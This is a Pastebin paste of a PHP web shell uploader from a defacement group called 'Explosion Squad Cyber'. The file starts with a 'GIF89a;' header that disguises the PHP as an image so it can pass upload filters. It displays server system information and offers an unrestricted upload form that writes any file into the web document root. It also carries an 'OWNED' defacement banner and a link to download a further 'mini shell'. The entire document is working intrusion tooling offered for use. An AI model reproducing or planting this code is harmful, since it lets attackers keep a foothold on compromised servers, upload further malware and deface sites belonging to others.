MR_OZO

uploader

Jul 29th, 2019
321
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 5.06 KB | None | 0 0
  1. GIF89a;
  2.  
  3. <!DOCTYPE HTML>
  4. <html lang="en-US">
  5. <head>
  6. <meta charset="UTF-8">
  7. <title>Explosion Squad Cyber</title>
  8. </head>
  9. <body background="http://4.bp.blogspot.com/-h1QH3MmXd4M/Uc64vsqmPeI/AAAAAAAAALs/Gi-fPnZ5V2Q/s1600/black+(11).jpg">
  10. <body>
  11. <script>
  12. </script>
  13. </style>
  14.  
  15. <center><br><img src="https://image.ibb.co/hWAnfA/IMG-20181110-015020.jpg" width="400" height="350"><center>
  16. <body>
  17.  
  18. <font face= "Architects Daughter">
  19. <font color='red' face='Architects Daughter' font size="5px"'>Explosion Squad Cyber Upl04d3r</font></b><center>
  20. <?php
  21. echo '<big><font color=white> System: <span style="color: lime;">'.php_uname().'</span></big><br>';
  22. echo "<font color=white>Your IP: <font color=blue>".$_SERVER['REMOTE_ADDR']."</font><br>";
  23. echo '<big><font color=white>Directory: <span style="color: aqua;">'.getcwd().'</span></big><br><br>';
  24. echo "<form method='post' enctype='multipart/form-data'>
  25. <input type='file' name='just_file'>
  26. <input type='submit' name='upload' value='Upload!'>
  27. </form>
  28. </center>";
  29. $root = $_SERVER['DOCUMENT_ROOT'];
  30. $files = $_FILES['just_file']['name'];
  31. $dest = $root.'/'.$files;
  32. if(isset($_POST['upload'])) {
  33. if(is_writable($root)) {
  34. if(@copy($_FILES['just_file']['tmp_name'], $dest)) {
  35. $web = "http://".$_SERVER['HTTP_HOST']."/";
  36. echo "<font color='lime'sukses upload -> <a href='$web$files' target='_blank'><b><u>$web/$files</u></b></a>";
  37. } else {
  38. echo "<font color='red'gagal upload di document root.";
  39. }
  40. } else {
  41. if(@copy($_FILES['just_file']['tmp_name'], $files)) {
  42. echo " upload <b>$files</b> di folder ini";
  43. } else {
  44. echo "gagal upload";
  45. }
  46. }
  47. }
  48. ?>
  49. </body>
  50. <br>
  51. <br>
  52. <br>
  53. <style> .error { text-align: center; font-family: 'Gilda Display', serif; -webkit-animation: noise-3 1s linear infinite; animation: noise-3 1s linear infinite; overflow: default; } .info { text-align: center; width: 200px; height: 60px; margin: auto; position: absolute; top: 280px; bottom: 0; left: 20px; right: 0; -webkit-animation: noise-3 1s linear infinite; animation: noise-3 1s linear infinite; } .info:after { content: 'OWNED'; font-family: OCR-A; font-size: 100px; text-align: center; width: 800px; margin: auto; position: absolute; top: 20px; bottom: 0; left: 40px; right: 0; opacity: 0; color: white; -webkit-animation: noise-1 .2s linear infinite; animation: noise-1 .2s linear infinite; } @-webkit-keyframes noise-1 { 0%, 20%, 40%, 60%, 70%, 90% {opacity: 0;} 10% {opacity: .1;} 50% {opacity: .5; left: -6px;} 80% {opacity: .3;} 100% {opacity: .6; left: 2px;} } @keyframes noise-1 { 0%, 20%, 40%, 60%, 70%, 90% {opacity: 0;} 10% {opacity: .1;} 50% {opacity: .5; left: -6px;} 80% {opacity: .3;} 100% {opacity: .6; left: 2px;} } @-webkit-keyframes noise-2 { 0%, 20%, 40%, 60%, 70%, 90% {opacity: 0;} 10% {opacity: .1;} 50% {opacity: .5; left: 6px;} 80% {opacity: .3;} 100% {opacity: .6; left: -2px;} } @keyframes noise-2 { 0%, 20%, 40%, 60%, 70%, 90% {opacity: 0;} 10% {opacity: .1;} 50% {opacity: .5; left: 6px;} 80% {opacity: .3;} 100% {opacity: .6; left: -2px;} } @-webkit-keyframes noise { 0%, 3%, 5%, 42%, 44%, 100% {opacity: 1; -webkit-transform: scaleY(1); transform: scaleY(1);} 4.3% {opacity: 1; -webkit-transform: scaleY(1.7); transform: scaleY(1.7);} 43% {opacity: 1; -webkit-transform: scaleX(1.5); transform: scaleX(1.5);} } @keyframes noise { 0%, 3%, 5%, 42%, 44%, 100% {opacity: 1; -webkit-transform: scaleY(1); transform: scaleY(1);} 4.3% {opacity: 1; -webkit-transform: scaleY(1.7); transform: scaleY(1.7);} 43% {opacity: 1; -webkit-transform: scaleX(1.5); transform: scaleX(1.5);} } @-webkit-keyframes noise-3 { 0%,3%,5%,42%,44%,100% {opacity: 1; -webkit-transform: scaleY(1); transform: scaleY(1);} 4.3% {opacity: 1; -webkit-transform: scaleY(4); transform: scaleY(4);} 43% {opacity: 1; -webkit-transform: scaleX(10) rotate(60deg); transform: scaleX(10) rotate (60deg);} } @keyframes noise-3 { 0%,3%,5%,42%,44%,100% {opacity: 1; -webkit-transform: scaleY(1); transform: scaleY(1);} 4.3% {opacity: 1; -webkit-transform: scaleY(4); transform: scaleY(4);} 43% {opacity: 1; -webkit-transform: scaleX(10) rotate(60deg); transform: scaleX(10) rotate (60deg);} } .wrap { top: 30%; left: 25%; height: 200px; margin-top: -100px; position: absolute; } code { color: white; } span.blue { color: #48beef; } span.comment { color: #7f8c8d; } span.orange { color: #f39c12; } span.green { color: #33cc33; } .viewFull { font-family:OCR-A; color:orange; text-decoration:; } } @media only screen and (min-height: 500px) { .viewFull{ display:none; } } </style> <center> <style> img { filter:alpha(opacity=70); -moz-opacity:0.7; opacity:0.7; } img:hover { filter:alpha(opacity=100); -moz-opacity:.0; opacity:1.0; } </style>
  54. <a href='https://www.facebook.com/EscTeam2018/' target='_blank'><font size='3px'>About Us</a> -
  55. <a href='http://www.explosionsquadcyber.id//' target='_blank'><font size='3px'>Website</a> -
  56. <a href='https://pastebin.com/raw/4TQMSsxp' target='_blank'><font size='3px'>Download Mini Shell Explosion Squad Cyber</a>
  57. </body>
  58. </html>
Add Comment
Please, Sign In to add comment